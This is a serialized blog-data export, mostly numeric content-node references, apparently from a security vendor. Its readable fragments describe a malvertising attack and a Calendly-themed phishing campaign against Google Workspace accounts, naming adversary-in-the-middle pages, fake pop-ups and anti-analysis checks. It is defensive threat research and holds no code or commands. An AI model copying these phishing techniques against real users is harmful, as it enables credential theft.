"content":35907,"nodeType":941},{},[35908,35917],{"data":35909,"content":35910,"nodeType":945},{},[35911],{"data":35912,"content":35913,"nodeType":860},{},[35914],{"data":35915,"marks":35916,"value":23382,"nodeType":864},{},[],{"data":35918,"content":35919,"nodeType":945},{},[35920],{"data":35921,"content":35922,"nodeType":860},{},[35923],{"data":35924,"marks":35925,"value":23392,"nodeType":864},{},[],{"data":35927,"content":35928,"nodeType":860},{},[35929],{"data":35930,"marks":35931,"value":23399,"nodeType":864},{},[],{"data":35933,"content":35936,"nodeType":996},{"target":35934},{"sys":35935},{"id":23404,"type":1001,"linkType":1002},[],{"data":35938,"content":35939,"nodeType":1005},{},[],{"data":35941,"content":35942,"nodeType":1009},{},[35943],{"data":35944,"marks":35945,"value":23416,"nodeType":864},{},[35946],{"type":899},{"data":35948,"content":35949,"nodeType":860},{},[35950,35953,35960,35963,35970],{"data":35951,"marks":35952,"value":23423,"nodeType":864},{},[],{"data":35954,"content":35955,"nodeType":883},{"uri":23426},[35956],{"data":35957,"marks":35958,"value":23432,"nodeType":864},{},[35959],{"type":1455},{"data":35961,"marks":35962,"value":23436,"nodeType":864},{},[],{"data":35964,"content":35965,"nodeType":883},{"uri":23439},[35966],{"data":35967,"marks":35968,"value":23445,"nodeType":864},{},[35969],{"type":1455},{"data":35971,"marks":35972,"value":23449,"nodeType":864},{},[],{"data":35974,"content":35977,"nodeType":996},{"target":35975},{"sys":35976},{"id":23454,"type":1001,"linkType":1002},[],{"data":35979,"content":35980,"nodeType":860},{},[35981,35984,35991],{"data":35982,"marks":35983,"value":23462,"nodeType":864},{},[],{"data":35985,"content":35986,"nodeType":883},{"uri":23465},[35987],{"data":35988,"marks":35989,"value":23471,"nodeType":864},{},[35990],{"type":1455},{"data":35992,"marks":35993,"value":10094,"nodeType":864},{},[],{"data":35995,"content":35998,"nodeType":996},{"target":35996},{"sys":35997},{"id":23479,"type":1001,"linkType":1002},[],{"data":36000,"content":36001,"nodeType":860},{},[36002,36005,36012],{"data":36003,"marks":36004,"value":23487,"nodeType":864},{},[],{"data":36006,"content":36007,"nodeType":883},{"uri":23490},[36008],{"data":36009,"marks":36010,"value":13810,"nodeType":864},{},[36011],{"type":1455},{"data":36013,"marks":36014,"value":23499,"nodeType":864},{},[],{"data":36016,"content":36017,"nodeType":860},{},[36018],{"data":36019,"marks":36020,"value":23506,"nodeType":864},{},[],{"data":36022,"content":36025,"nodeType":996},{"target":36023},{"sys":36024},{"id":23511,"type":1001,"linkType":1002},[],{"data":36027,"content":36028,"nodeType":1005},{},[],{"data":36030,"content":36031,"nodeType":1009},{},[36032],{"data":36033,"marks":36034,"value":23523,"nodeType":864},{},[36035],{"type":899},{"data":36037,"content":36038,"nodeType":860},{},[36039],{"data":36040,"marks":36041,"value":23530,"nodeType":864},{},[],{"data":36043,"content":36044,"nodeType":860},{},[36045,36048,36055],{"data":36046,"marks":36047,"value":23537,"nodeType":864},{},[],{"data":36049,"content":36050,"nodeType":883},{"uri":23540},[36051],{"data":36052,"marks":36053,"value":23546,"nodeType":864},{},[36054],{"type":1455},{"data":36056,"marks":36057,"value":23550,"nodeType":864},{},[],{"data":36059,"content":36060,"nodeType":860},{},[36061],{"data":36062,"marks":36063,"value":23557,"nodeType":864},{},[],{"data":36065,"content":36066,"nodeType":860},{},[36067,36070,36077],{"data":36068,"marks":36069,"value":23564,"nodeType":864},{},[],{"data":36071,"content":36072,"nodeType":883},{"uri":23567},[36073],{"data":36074,"marks":36075,"value":23573,"nodeType":864},{},[36076],{"type":1455},{"data":36078,"marks":36079,"value":23577,"nodeType":864},{},[],{"data":36081,"content":36082,"nodeType":860},{},[36083],{"data":36084,"marks":36085,"value":23584,"nodeType":864},{},[],{"data":36087,"content":36090,"nodeType":996},{"target":36088},{"sys":36089},{"id":23589,"type":1001,"linkType":1002},[],{"data":36092,"content":36093,"nodeType":1005},{},[],{"data":36095,"content":36096,"nodeType":1009},{},[36097],{"data":36098,"marks":36099,"value":23601,"nodeType":864},{},[36100],{"type":899},{"data":36102,"content":36103,"nodeType":860},{},[36104],{"data":36105,"marks":36106,"value":23608,"nodeType":864},{},[],{"data":36108,"content":36109,"nodeType":941},{},[36110,36119,36128],{"data":36111,"content":36112,"nodeType":945},{},[36113],{"data":36114,"content":36115,"nodeType":860},{},[36116],{"data":36117,"marks":36118,"value":23621,"nodeType":864},{},[],{"data":36120,"content":36121,"nodeType":945},{},[36122],{"data":36123,"content":36124,"nodeType":860},{},[36125],{"data":36126,"marks":36127,"value":23631,"nodeType":864},{},[],{"data":36129,"content":36130,"nodeType":945},{},[36131],{"data":36132,"content":36133,"nodeType":860},{},[36134],{"data":36135,"marks":36136,"value":23641,"nodeType":864},{},[],{"data":36138,"content":36139,"nodeType":860},{},[36140],{"data":36141,"marks":36142,"value":23648,"nodeType":864},{},[],{"data":36144,"content":36145,"nodeType":860},{},[36146],{"data":36147,"marks":36148,"value":23655,"nodeType":864},{},[],{"data":36150,"content":36151,"nodeType":941},{},[36152,36171,36180],{"data":36153,"content":36154,"nodeType":945},{},[36155],{"data":36156,"content":36157,"nodeType":860},{},[36158,36161,36168],{"data":36159,"marks":36160,"value":23668,"nodeType":864},{},[],{"data":36162,"content":36163,"nodeType":883},{"uri":23671},[36164],{"data":36165,"marks":36166,"value":23677,"nodeType":864},{},[36167],{"type":1455},{"data":36169,"marks":36170,"value":23681,"nodeType":864},{},[],{"data":36172,"content":36173,"nodeType":945},{},[36174],{"data":36175,"content":36176,"nodeType":860},{},[36177],{"data":36178,"marks":36179,"value":23691,"nodeType":864},{},[],{"data":36181,"content":36182,"nodeType":945},{},[36183],{"data":36184,"content":36185,"nodeType":860},{},[36186],{"data":36187,"marks":36188,"value":23701,"nodeType":864},{},[],{"data":36190,"content":36191,"nodeType":860},{},[36192,36195,36201],{"data":36193,"marks":36194,"value":23708,"nodeType":864},{},[],{"data":36196,"content":36197,"nodeType":883},{"uri":19546},[36198],{"data":36199,"marks":36200,"value":23715,"nodeType":864},{},[],{"data":36202,"marks":36203,"value":23719,"nodeType":864},{},[],{"data":36205,"content":36206,"nodeType":1116},{},[36207],{"data":36208,"content":36209,"nodeType":860},{},[36210],{"data":36211,"marks":36212,"value":23729,"nodeType":864},{},[],{"data":36214,"content":36215,"nodeType":860},{},[36216],{"data":36217,"marks":36218,"value":23736,"nodeType":864},{},[],{"data":36220,"content":36221,"nodeType":1005},{},[],{"data":36223,"content":36224,"nodeType":1009},{},[36225],{"data":36226,"marks":36227,"value":23747,"nodeType":864},{},[36228],{"type":899},{"data":36230,"content":36231,"nodeType":860},{},[36232,36235,36242],{"data":36233,"marks":36234,"value":23754,"nodeType":864},{},[],{"data":36236,"content":36237,"nodeType":883},{"uri":23757},[36238],{"data":36239,"marks":36240,"value":23763,"nodeType":864},{},[36241],{"type":1455},{"data":36243,"marks":36244,"value":23767,"nodeType":864},{},[],{"data":36246,"content":36247,"nodeType":860},{},[36248],{"data":36249,"marks":36250,"value":23774,"nodeType":864},{},[],{"data":36252,"content":36253,"nodeType":860},{},[36254],{"data":36255,"marks":36256,"value":23781,"nodeType":864},{},[],{"data":36258,"content":36261,"nodeType":996},{"target":36259},{"sys":36260},{"id":23786,"type":1001,"linkType":1002},[],{"data":36263,"content":36264,"nodeType":1005},{},[],{"data":36266,"content":36267,"nodeType":1009},{},[36268],{"data":36269,"marks":36270,"value":23798,"nodeType":864},{},[36271],{"type":899},{"data":36273,"content":36274,"nodeType":860},{},[36275,36278,36285],{"data":36276,"marks":36277,"value":23805,"nodeType":864},{},[],{"data":36279,"content":36280,"nodeType":883},{"uri":23808},[36281],{"data":36282,"marks":36283,"value":23814,"nodeType":864},{},[36284],{"type":1455},{"data":36286,"marks":36287,"value":23818,"nodeType":864},{},[],{"data":36289,"content":36290,"nodeType":860},{},[36291,36294,36301,36304,36311],{"data":36292,"marks":36293,"value":16314,"nodeType":864},{},[],{"data":36295,"content":36296,"nodeType":883},{"uri":10269},[36297],{"data":36298,"marks":36299,"value":10275,"nodeType":864},{},[36300],{"type":1455},{"data":36302,"marks":36303,"value":19754,"nodeType":864},{},[],{"data":36305,"content":36306,"nodeType":883},{"uri":1700},[36307],{"data":36308,"marks":36309,"value":10299,"nodeType":864},{},[36310],{"type":1455},{"data":36312,"marks":36313,"value":2924,"nodeType":864},{},[],{"data":36315,"content":36318,"nodeType":996},{"target":36316},{"sys":36317},{"id":23404,"type":1001,"linkType":1002},[],{"data":36320,"content":36321,"nodeType":860},{},[36322],{"data":36323,"marks":36324,"value":21,"nodeType":864},{},[],{"items":36326},[36327,36329],{"sys":36328,"name":342},{"id":6596},{"sys":36330,"name":6593},{"id":6592},{"items":36332},[36333],{"fullName":2736,"firstName":2737,"jobTitle":2738,"profilePicture":36334},{"url":2740},"blog/analysing-a-malvertising-attack-targeting-business-google-accounts",{"json":36337},{"data":36338,"content":36339,"nodeType":856},{},[36340],{"data":36341,"content":36342,"nodeType":860},{},[36343],{"data":36344,"marks":36345,"value":36346,"nodeType":864},{},[],"Our browser-based security platform recently intercepted a malvertising attack against Push customers. This attack was notable in that it used malvertising via Google Search as the delivery vector, circumventing email-based security controls. Here’s our breakdown. ",{"id":28410,"publishedAt":36348},"2026-08-12T11:53:30.929Z",{"items":36350},[36351,36353],{"sys":36352,"name":342},{"id":6596},{"sys":36354,"name":6593},{"id":6592},{"items":36356},[36357,36359,36361,36363,36365,36367,36369,36371,36373,36375,36377],{"sys":36358,"name":279,"slug":280,"tier":31},{"id":276},{"sys":36360,"name":519,"slug":520,"tier":31},{"id":516},{"sys":36362,"name":342,"slug":343,"tier":31},{"id":339},{"sys":36364,"name":440,"slug":441,"tier":45},{"id":437},{"sys":36366,"name":261,"slug":262,"tier":45},{"id":258},{"sys":36368,"name":324,"slug":325,"tier":45},{"id":321},{"sys":36370,"name":571,"slug":572,"tier":45},{"id":568},{"sys":36372,"name":466,"slug":467,"tier":45},{"id":463},{"sys":36374,"name":475,"slug":476,"tier":45},{"id":472},{"sys":36376,"name":431,"slug":432,"tier":45},{"id":428},{"sys":36378,"name":351,"slug":352,"tier":45},{"id":348},"kjD7b3j4dqsCYR9hli6DJMK3c1DHwzPgGGSLdzwWoSY",{"id":36381,"title":29375,"authorsCollection":36382,"content":36387,"extension":228,"faqItemsCollection":37069,"faqTitle":59,"featured":6,"hashTags":59,"meta":37071,"metaTitle":37072,"ogImage":59,"postType":5740,"publishedDate":28784,"relatedBlogPostsCollection":37073,"slug":29377,"stem":38734,"subtitle":59,"summary":38735,"synopsis":29376,"sys":38746,"tagsCollection":38748,"topicsCollection":38754,"__hash__":38786},"blog/blog/uncovering-a-calendly-themed-phishing-campaign.json",{"items":36383},[36384],{"fullName":4949,"firstName":4950,"jobTitle":4951,"socialLinks":36385,"profilePicture":36386},[4953],{"url":4955},{"json":36388,"links":36895},{"data":36389,"content":36390,"nodeType":856},{},[36391,36397,36403,36409,36414,36420,36423,36430,36436,36442,36448,36453,36459,36464,36470,36475,36481,36486,36512,36518,36523,36529,36534,36540,36545,36551,36590,36593,36600,36606,36612,36618,36623,36626,36633,36639,36655,36660,36665,36670,36676,36681,36686,36702,36705,36712,36728,36733,36739,36755,36762,36768,36774,36780,36796,36803,36809,36814,36817,36824,36830,36836,36839,36846,36852,36858,36884,36889],{"data":36392,"content":36393,"nodeType":860},{},[36394],{"data":36395,"marks":36396,"value":28809,"nodeType":864},{},[],{"data":36398,"content":36399,"nodeType":860},{},[36400],{"data":36401,"marks":36402,"value":28816,"nodeType":864},{},[],{"data":36404,"content":36405,"nodeType":860},{},[36406],{"data":36407,"marks":36408,"value":28823,"nodeType":864},{},[],{"data":36410,"content":36413,"nodeType":996},{"target":36411},{"sys":36412},{"id":28828,"type":1001,"linkType":1002},[],{"data":36415,"content":36416,"nodeType":860},{},[36417],{"data":36418,"marks":36419,"value":28836,"nodeType":864},{},[],{"data":36421,"content":36422,"nodeType":1005},{},[],{"data":36424,"content":36425,"nodeType":1009},{},[36426],{"data":36427,"marks":36428,"value":28847,"nodeType":864},{},[36429],{"type":899},{"data":36431,"content":36432,"nodeType":860},{},[36433],{"data":36434,"marks":36435,"value":28854,"nodeType":864},{},[],{"data":36437,"content":36438,"nodeType":860},{},[36439],{"data":36440,"marks":36441,"value":28861,"nodeType":864},{},[],{"data":36443,"content":36444,"nodeType":860},{},[36445],{"data":36446,"marks":36447,"value":28868,"nodeType":864},{},[],{"data":36449,"content":36452,"nodeType":996},{"target":36450},{"sys":36451},{"id":28873,"type":1001,"linkType":1002},[],{"data":36454,"content":36455,"nodeType":860},{},[36456],{"data":36457,"marks":36458,"value":28881,"nodeType":864},{},[],{"data":36460,"content":36463,"nodeType":996},{"target":36461},{"sys":36462},{"id":28886,"type":1001,"linkType":1002},[],{"data":36465,"content":36466,"nodeType":860},{},[36467],{"data":36468,"marks":36469,"value":28894,"nodeType":864},{},[],{"data":36471,"content":36474,"nodeType":996},{"target":36472},{"sys":36473},{"id":28899,"type":1001,"linkType":1002},[],{"data":36476,"content":36477,"nodeType":860},{},[36478],{"data":36479,"marks":36480,"value":28907,"nodeType":864},{},[],{"data":36482,"content":36485,"nodeType":996},{"target":36483},{"sys":36484},{"id":28912,"type":1001,"linkType":1002},[],{"data":36487,"content":36488,"nodeType":860},{},[36489,36492,36499,36502,36509],{"data":36490,"marks":36491,"value":28920,"nodeType":864},{},[],{"data":36493,"content":36494,"nodeType":883},{"uri":26883},[36495],{"data":36496,"marks":36497,"value":28928,"nodeType":864},{},[36498],{"type":1455},{"data":36500,"marks":36501,"value":28932,"nodeType":864},{},[],{"data":36503,"content":36504,"nodeType":883},{"uri":7124},[36505],{"data":36506,"marks":36507,"value":7129,"nodeType":864},{},[36508],{"type":1455},{"data":36510,"marks":36511,"value":28943,"nodeType":864},{},[],{"data":36513,"content":36514,"nodeType":860},{},[36515],{"data":36516,"marks":36517,"value":28950,"nodeType":864},{},[],{"data":36519,"content":36522,"nodeType":996},{"target":36520},{"sys":36521},{"id":28955,"type":1001,"linkType":1002},[],{"data":36524,"content":36525,"nodeType":860},{},[36526],{"data":36527,"marks":36528,"value":28963,"nodeType":864},{},[],{"data":36530,"content":36533,"nodeType":996},{"target":36531},{"sys":36532},{"id":28968,"type":1001,"linkType":1002},[],{"data":36535,"content":36536,"nodeType":860},{},[36537],{"data":36538,"marks":36539,"value":28976,"nodeType":864},{},[],{"data":36541,"content":36544,"nodeType":996},{"target":36542},{"sys":36543},{"id":28981,"type":1001,"linkType":1002},[],{"data":36546,"content":36547,"nodeType":860},{},[36548],{"data":36549,"marks":36550,"value":28989,"nodeType":864},{},[],{"data":36552,"content":36553,"nodeType":941},{},[36554,36563,36572,36581],{"data":36555,"content":36556,"nodeType":945},{},[36557],{"data":36558,"content":36559,"nodeType":860},{},[36560],{"data":36561,"marks":36562,"value":29002,"nodeType":864},{},[],{"data":36564,"content":36565,"nodeType":945},{},[36566],{"data":36567,"content":36568,"nodeType":860},{},[36569],{"data":36570,"marks":36571,"value":29012,"nodeType":864},{},[],{"data":36573,"content":36574,"nodeType":945},{},[36575],{"data":36576,"content":36577,"nodeType":860},{},[36578],{"data":36579,"marks":36580,"value":29022,"nodeType":864},{},[],{"data":36582,"content":36583,"nodeType":945},{},[36584],{"data":36585,"content":36586,"nodeType":860},{},[36587],{"data":36588,"marks":36589,"value":29032,"nodeType":864},{},[],{"data":36591,"content":36592,"nodeType":1005},{},[],{"data":36594,"content":36595,"nodeType":1009},{},[36596],{"data":36597,"marks":36598,"value":29043,"nodeType":864},{},[36599],{"type":899},{"data":36601,"content":36602,"nodeType":860},{},[36603],{"data":36604,"marks":36605,"value":29050,"nodeType":864},{},[],{"data":36607,"content":36608,"nodeType":860},{},[36609],{"data":36610,"marks":36611,"value":29057,"nodeType":864},{},[],{"data":36613,"content":36614,"nodeType":860},{},[36615],{"data":36616,"marks":36617,"value":29064,"nodeType":864},{},[],{"data":36619,"content":36622,"nodeType":996},{"target":36620},{"sys":36621},{"id":29069,"type":1001,"linkType":1002},[],{"data":36624,"content":36625,"nodeType":1005},{},[],{"data":36627,"content":36628,"nodeType":1009},{},[36629],{"data":36630,"marks":36631,"value":29081,"nodeType":864},{},[36632],{"type":899},{"data":36634,"content":36635,"nodeType":860},{},[36636],{"data":36637,"marks":36638,"value":29088,"nodeType":864},{},[],{"data":36640,"content":36641,"nodeType":860},{},[36642,36645,36652],{"data":36643,"marks":36644,"value":29095,"nodeType":864},{},[],{"data":36646,"content":36647,"nodeType":883},{"uri":29098},[36648],{"data":36649,"marks":36650,"value":29104,"nodeType":864},{},[36651],{"type":1455},{"data":36653,"marks":36654,"value":29108,"nodeType":864},{},[],{"data":36656,"content":36659,"nodeType":996},{"target":36657},{"sys":36658},{"id":29113,"type":1001,"linkType":1002},[],{"data":36661,"content":36664,"nodeType":996},{"target":36662},{"sys":36663},{"id":29119,"type":1001,"linkType":1002},[],{"data":36666,"content":36669,"nodeType":996},{"target":36667},{"sys":36668},{"id":29125,"type":1001,"linkType":1002},[],{"data":36671,"content":36672,"nodeType":860},{},[36673],{"data":36674,"marks":36675,"value":29133,"nodeType":864},{},[],{"data":36677,"content":36680,"nodeType":996},{"target":36678},{"sys":36679},{"id":29138,"type":1001,"linkType":1002},[],{"data":36682,"content":36685,"nodeType":996},{"target":36683},{"sys":36684},{"id":29144,"type":1001,"linkType":1002},[],{"data":36687,"content":36688,"nodeType":860},{},[36689,36692,36699],{"data":36690,"marks":36691,"value":29152,"nodeType":864},{},[],{"data":36693,"content":36694,"nodeType":883},{"uri":29155},[36695],{"data":36696,"marks":36697,"value":29161,"nodeType":864},{},[36698],{"type":1455},{"data":36700,"marks":36701,"value":29165,"nodeType":864},{},[],{"data":36703,"content":36704,"nodeType":1005},{},[],{"data":36706,"content":36707,"nodeType":1009},{},[36708],{"data":36709,"marks":36710,"value":29176,"nodeType":864},{},[36711],{"type":899},{"data":36713,"content":36714,"nodeType":860},{},[36715,36718,36725],{"data":36716,"marks":36717,"value":29183,"nodeType":864},{},[],{"data":36719,"content":36720,"nodeType":883},{"uri":29186},[36721],{"data":36722,"marks":36723,"value":13810,"nodeType":864},{},[36724],{"type":1455},{"data":36726,"marks":36727,"value":29195,"nodeType":864},{},[],{"data":36729,"content":36732,"nodeType":996},{"target":36730},{"sys":36731},{"id":29200,"type":1001,"linkType":1002},[],{"data":36734,"content":36735,"nodeType":860},{},[36736],{"data":36737,"marks":36738,"value":29208,"nodeType":864},{},[],{"data":36740,"content":36741,"nodeType":860},{},[36742,36745,36752],{"data":36743,"marks":36744,"value":28577,"nodeType":864},{},[],{"data":36746,"content":36747,"nodeType":883},{"uri":13019},[36748],{"data":36749,"marks":36750,"value":315,"nodeType":864},{},[36751],{"type":1455},{"data":36753,"marks":36754,"value":28588,"nodeType":864},{},[],{"data":36756,"content":36757,"nodeType":1312},{},[36758],{"data":36759,"marks":36760,"value":29232,"nodeType":864},{},[36761],{"type":899},{"data":36763,"content":36764,"nodeType":860},{},[36765],{"data":36766,"marks":36767,"value":29239,"nodeType":864},{},[],{"data":36769,"content":36770,"nodeType":860},{},[36771],{"data":36772,"marks":36773,"value":29246,"nodeType":864},{},[],{"data":36775,"content":36776,"nodeType":860},{},[36777],{"data":36778,"marks":36779,"value":28556,"nodeType":864},{},[],{"data":36781,"content":36782,"nodeType":860},{},[36783,36786,36793],{"data":36784,"marks":36785,"value":29259,"nodeType":864},{},[],{"data":36787,"content":36788,"nodeType":883},{"uri":6237},[36789],{"data":36790,"marks":36791,"value":6242,"nodeType":864},{},[36792],{"type":1455},{"data":36794,"marks":36795,"value":29270,"nodeType":864},{},[],{"data":36797,"content":36798,"nodeType":1312},{},[36799],{"data":36800,"marks":36801,"value":29278,"nodeType":864},{},[36802],{"type":899},{"data":36804,"content":36805,"nodeType":860},{},[36806],{"data":36807,"marks":36808,"value":29285,"nodeType":864},{},[],{"data":36810,"content":36813,"nodeType":996},{"target":36811},{"sys":36812},{"id":29290,"type":1001,"linkType":1002},[],{"data":36815,"content":36816,"nodeType":1005},{},[],{"data":36818,"content":36819,"nodeType":1009},{},[36820],{"data":36821,"marks":36822,"value":5571,"nodeType":864},{},[36823],{"type":899},{"data":36825,"content":36826,"nodeType":860},{},[36827],{"data":36828,"marks":36829,"value":29308,"nodeType":864},{},[],{"data":36831,"content":36832,"nodeType":860},{},[36833],{"data":36834,"marks":36835,"value":28714,"nodeType":864},{},[],{"data":36837,"content":36838,"nodeType":1005},{},[],{"data":36840,"content":36841,"nodeType":1009},{},[36842],{"data":36843,"marks":36844,"value":3578,"nodeType":864},{},[36845],{"type":899},{"data":36847,"content":36848,"nodeType":860},{},[36849],{"data":36850,"marks":36851,"value":29331,"nodeType":864},{},[],{"data":36853,"content":36854,"nodeType":860},{},[36855],{"data":36856,"marks":36857,"value":19737,"nodeType":864},{},[],{"data":36859,"content":36860,"nodeType":860},{},[36861,36864,36871,36874,36881],{"data":36862,"marks":36863,"value":16314,"nodeType":864},{},[],{"data":36865,"content":36866,"nodeType":883},{"uri":10269},[36867],{"data":36868,"marks":36869,"value":10275,"nodeType":864},{},[36870],{"type":1455},{"data":36872,"marks":36873,"value":19754,"nodeType":864},{},[],{"data":36875,"content":36876,"nodeType":883},{"uri":1700},[36877],{"data":36878,"marks":36879,"value":10299,"nodeType":864},{},[36880],{"type":1455},{"data":36882,"marks":36883,"value":2924,"nodeType":864},{},[],{"data":36885,"content":36888,"nodeType":996},{"target":36886},{"sys":36887},{"id":27224,"type":1001,"linkType":1002},[],{"data":36890,"content":36891,"nodeType":860},{},[36892],{"data":36893,"marks":36894,"value":21,"nodeType":864},{},[],{"entries":36896},{"hyperlink":36897,"inline":36898,"block":36899},[],[],[36900,36919,36926,36940,36947,36953,36958,36963,36969,36975,36982,36988,36994,36999,37004,37041,37067],{"sys":36901,"__typename":1740,"content":36902,"name":36918,"title":59},{"id":28828},{"json":36903},{"data":36904,"content":36905,"nodeType":856},{},[36906],{"data":36907,"content":36908,"nodeType":860},{},[36909,36914],{"data":36910,"marks":36911,"value":36913,"nodeType":864},{},[36912],{"type":899},"Disclaimer:",{"data":36915,"marks":36916,"value":36917,"nodeType":864},{},[]," This campaign uses the names and images of real employees working for various companies that the attacker was impersonating. We have opted to redact any personally identifiable information, which extends to screenshots of the phishing pages with names and profile pictures, as well as names included in the phishing page URLs. ","Google Phishing Insight Box 4",{"sys":36920,"__typename":1724,"title":36921,"caption":36921,"layoutMode":59,"file":36922},{"id":28873},"Well-crafted, multi-stage, highly targeted phishing email coming from an account impersonating a real LVMH employee.",{"url":36923,"width":36924,"height":36925},"https://images.ctfassets.net/y1cdw1ablpvd/1l9ZXvGgfSzYdwKxd9bvSq/3d89d9bd9860374ccba6bd04762f44a4/image11.png",1044,744,{"sys":36927,"__typename":1740,"content":36928,"name":36939,"title":59},{"id":28886},{"json":36929},{"nodeType":856,"data":36930,"content":36931},{},[36932],{"nodeType":860,"data":36933,"content":36934},{},[36935],{"nodeType":864,"value":36936,"marks":36937,"data":36938},"This approach is intentional. The multi-stage message is likely designed to defeat email content scanning tools looking for messages containing a link requesting an urgent response.",[],{},"Google Phishing Insight Box 1",{"sys":36941,"__typename":1724,"title":36942,"caption":36942,"layoutMode":59,"file":36943},{"id":28899},"Fake Calendly landing page. ",{"url":36944,"width":36945,"height":36946},"https://images.ctfassets.net/y1cdw1ablpvd/4YX3lqU3K4EVv230yAXPLu/1d640fd64d2db7b55b64828e02bb244b/Group_584.png",3416,1924,{"sys":36948,"__typename":1724,"title":36949,"caption":36950,"layoutMode":59,"file":36951},{"id":28912},"Calendly-themed AITM phishing page targeting Google Workspace accounts.","Calendly-themed AiTM phishing page targeting Google Workspace accounts.",{"url":36952,"width":1736,"height":27884},"https://images.ctfassets.net/y1cdw1ablpvd/30KsB1ENDg9m4X3srhYIpW/b57d6a0420a9991a37e138c6edc47ac5/image12.png",{"sys":36954,"__typename":1724,"title":36955,"caption":36955,"layoutMode":59,"file":36956},{"id":28955},"Request and response challenge on the AITM phishing page, denying unauthorized email domains from being able to log in to the page.",{"url":36957,"width":1736,"height":1737},"https://images.ctfassets.net/y1cdw1ablpvd/3ExT9jjIBk4CnbHSbjYuki/7d00292474ee4d9a4f433463d4242f89/image9.png",{"sys":36959,"__typename":1724,"title":36960,"caption":36960,"layoutMode":59,"file":36961},{"id":28968},"After entering an allowed email domain, the password entry field loads.",{"url":36962,"width":1736,"height":27884},"https://images.ctfassets.net/y1cdw1ablpvd/5JzkZirFB5VsTMbf9nlX58/6d7f6d72465df9c0133044bce33c6de1/image1.png",{"sys":36964,"__typename":1724,"title":36965,"caption":36965,"layoutMode":59,"file":36966},{"id":28981},"Webpages with similar properties to the attack analysed by Push.",{"url":36967,"width":1736,"height":36968},"https://images.ctfassets.net/y1cdw1ablpvd/T7zU58u4ts7e1ug1ScdjT/d84c1d1a8f785d637da9dcc4639e4899/image1.png",1182,{"sys":36970,"__typename":1724,"title":36971,"caption":36971,"layoutMode":59,"file":36972},{"id":29069},"Pages with similar properties impersonating Unilever, Disney, Lego, Artisan, and many more brands that look to be an older-style version of the same campaign.",{"url":36973,"width":1736,"height":36974},"https://images.ctfassets.net/y1cdw1ablpvd/6rzP1eIMjdI6rCPTQEQvMe/a57c25f26f5ff9e38e1ecfbe47a5e039/image6.png",1732,{"sys":36976,"__typename":1724,"title":36977,"caption":36977,"layoutMode":59,"file":36978},{"id":29113},"Newer phishing variant impersonating Calendly.",{"url":36979,"width":36980,"height":36981},"https://images.ctfassets.net/y1cdw1ablpvd/5yCWaYqsekS318AarCfkzc/e0c469becdfc3dcbfbbe5bab4d94ff14/Group_585.png",3448,2072,{"sys":36983,"__typename":1724,"title":36984,"caption":36984,"layoutMode":59,"file":36985},{"id":29119},"BITB-style pop-up window showing a legitimate-looking URL (instead of the phishing server it really points to).",{"url":36986,"width":1736,"height":36987},"https://images.ctfassets.net/y1cdw1ablpvd/4oeu6wp1oKSHblbVf6M2vN/a29ce019b7f5e40eb8017c3a28553457/image2.png",1202,{"sys":36989,"__typename":1724,"title":36990,"caption":36991,"layoutMode":59,"file":36992},{"id":29125},"Recent phishing page targeting both Facebook and Google accounts.","A different version of the page targeting both Facebook and Google accounts.",{"url":36993,"width":36980,"height":36981},"https://images.ctfassets.net/y1cdw1ablpvd/2Q3XlETnZXxFP4iArO0n8E/238bec1cbc9b6a3a27c173ce6d700ef4/Frame_627989.png",{"sys":36995,"__typename":1724,"title":36996,"caption":36996,"layoutMode":59,"file":36997},{"id":29138},"Anti-analysis functionality observed on the phishing page. ",{"url":36998,"width":1736,"height":36987},"https://images.ctfassets.net/y1cdw1ablpvd/32oz0k8DQ8JjMxG1ZirL5O/98603c762565ab073f7c5279ed06b952/image7.png",{"sys":37000,"__typename":1724,"title":37001,"caption":37001,"layoutMode":59,"file":37002},{"id":29144},"Access blocked when browsing from a VPN/Proxy.",{"url":37003,"width":8970,"height":1837},"https://images.ctfassets.net/y1cdw1ablpvd/27YWvGWWkoLgWnPvB9YDKt/e941d3ce4ba0df2a2206b0bcf1758b71/image_671.png",{"sys":37005,"__typename":1740,"content":37006,"name":37040,"title":59},{"id":29200},{"json":37007},{"nodeType":856,"data":37008,"content":37009},{},[37010],{"nodeType":860,"data":37011,"content":37012},{},[37013,37017,37025,37029,37036],{"nodeType":864,"value":37014,"marks":37015,"data":37016},"Campaigns targeting Google accounts specifically are becoming increasingly common. ",[],{},{"nodeType":883,"data":37018,"content":37019},{"uri":18157},[37020],{"nodeType":864,"value":37021,"marks":37022,"data":37024},"Sublime discussed a similar job lure focused campaign impersonating Google Careers",[37023],{"type":1455},{},{"nodeType":864,"value":37026,"marks":37027,"data":37028}," (which we’ve spotted recently too), while we also identified a ",[],{},{"nodeType":883,"data":37030,"content":37031},{"uri":26680},[37032],{"nodeType":864,"value":37033,"marks":37034,"data":37035},"campaign targeting Google Ad accounts via malvertising on Google Search",[],{},{"nodeType":864,"value":37037,"marks":37038,"data":37039}," around the same time that this attack was identified.",[],{},"Google Phishing Insight Box 3",{"sys":37042,"__typename":1740,"content":37043,"name":37066,"title":59},{"id":29290},{"json":37044},{"nodeType":856,"data":37045,"content":37046},{},[37047],{"nodeType":860,"data":37048,"content":37049},{},[37050,37054,37062],{"nodeType":864,"value":37051,"marks":37052,"data":37053},"Even for organizations using a different primary cloud platform but with more than one IdP account per user (e.g. having a Microsoft and Google account) this can be abused by attackers taking advantage of overly permissive SSO configurations (also known as ",[],{},{"nodeType":883,"data":37055,"content":37056},{"uri":25156},[37057],{"nodeType":864,"value":37058,"marks":37059,"data":37061},"Cross-IdP impersonation",[37060],{"type":1455},{},{"nodeType":864,"value":37063,"marks":37064,"data":37065},") which we covered in research last year.",[],{},"Google Phishing Insight Box 2",{"sys":37068,"__typename":1717,"type":1718,"ctaText":30103,"buttonLabel":1720,"buttonColour":1721,"buttonUrl":30037},{"id":27224},{"items":37070},[],{},"Uncovering a Calendly-themed phishing campaign 